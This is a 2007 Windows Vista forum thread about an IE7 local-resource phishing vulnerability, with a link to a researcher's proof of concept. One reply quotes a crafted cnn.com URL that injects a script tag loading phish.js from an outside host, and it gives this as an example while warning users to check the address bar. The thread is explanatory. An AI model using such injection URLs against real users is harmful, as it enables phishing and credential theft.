Windows Vista Forums
Vista Forums Home Join Vista Forums Tech Publications Windows 7 Forum Vista Tutorials Webcasts Tags

Welcome to Vista Forums we are your forum for Windows Vista help and discussion. Whether you need help or just want to post an idea you have on Vista, this is the forum for you.
Register at Vista forums...the world biggest Windows Vista resource Join Vista Forums Now

Go Back   Vista Forums > Vista Newsgroups > Vista security

IE7 Phishing Hole Info and Proof of Concept released

Update your Vista Drivers
Reply
 
Thread Tools Display Modes
Old 03-14-2007   #1 (permalink)
Steve
Guest


 

IE7 Phishing Hole Info and Proof of Concept released


A vulnerability has been found in IE7 that would allow a Phishing site
to be displayed on a users screen...

The user has provied proof if concept code that can show you the
problem in action.

"Phishing using IE7 local resource vulnerability" at 'Aviv Raff On .NET
- Phishing using IE7 local resource vulnerability'
(http://tinyurl.com/29mbtf)


--
Steve
Posted via http://www.vistaheads.com


My System SpecsSystem Spec
Old 03-14-2007   #2 (permalink)
Robert Firth
Guest


 

Re: IE7 Phishing Hole Info and Proof of Concept released

Read what is in the address bar! Of course, they could make the link long
enough that you don't see what else is in the field.

http://www.cnn.com/dateandtime/andsomeotherpadding/tomakethislookslike/alegitimatelink.html?");document.write('<script%20src=\'http://www.raffon.net/research/ms/ie/navcancl/phish.js\'></script>');//

^ Doesn't look like what should normally be in the address bar if you go to
cnn.com. Too much javascript.

--
/* * * * * * * * * * * * * * * * * *
* Robert Firth *
* Windows Vista x86 RTM *
* http://www.WinVistaInfo.org *
* * * * * * * * * * * * * * * * * */

"Steve" <Steve.2ngto1@no-mx.forums.vistaheads.com> wrote in message
news:Steve.2ngto1@no-mx.forums.vistaheads.com...
>
> A vulnerability has been found in IE7 that would allow a Phishing site
> to be displayed on a users screen...
>
> The user has provied proof if concept code that can show you the
> problem in action.
>
> "Phishing using IE7 local resource vulnerability" at 'Aviv Raff On .NET
> - Phishing using IE7 local resource vulnerability'
> (http://tinyurl.com/29mbtf)
>
>
> --
> Steve
> Posted via http://www.vistaheads.com
>


My System SpecsSystem Spec
Reply
Update your Vista Drivers

Thread Tools
Display Modes



Similar Threads
Thread Thread Starter Forum Replies Last Post
WLM crashes my PC?? Log has proof! TheCroW Live Messenger 1 02-14-2008 01:25 PM
Proof-of-concept virus gives insight into OpenOffice.org securityfailings Frank Vista General 10 05-23-2007 10:40 PM
Black Hole Beebop Vista General 0 10-15-2006 07:33 AM
the concept of camera in 3D Daniel Avalon 6 06-05-2006 03:06 AM
Concept of Template Triggers and EventTriggers HolaMan Avalon 4 04-21-2006 08:11 PM


Complimentary Industry Resources

Vista Forums has joined forces with TradePub.com to offer you a new, exciting, and entirely free professional resource. Visit http://vistax64.tradepub.com today to browse our selection of complimentary Industry magazines, white papers, webinars, podcasts, and more across 34 industry sectors. No credit cards, coupons, or promo codes required. Try it today!




Vista Forums is an independent web site and has not been authorized,
sponsored, or otherwise approved by Microsoft Corporation.
"Windows Vista", the Start Orb, and related materials are trademarks of Microsoft Corp.
© Designer Media 2005-2008

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51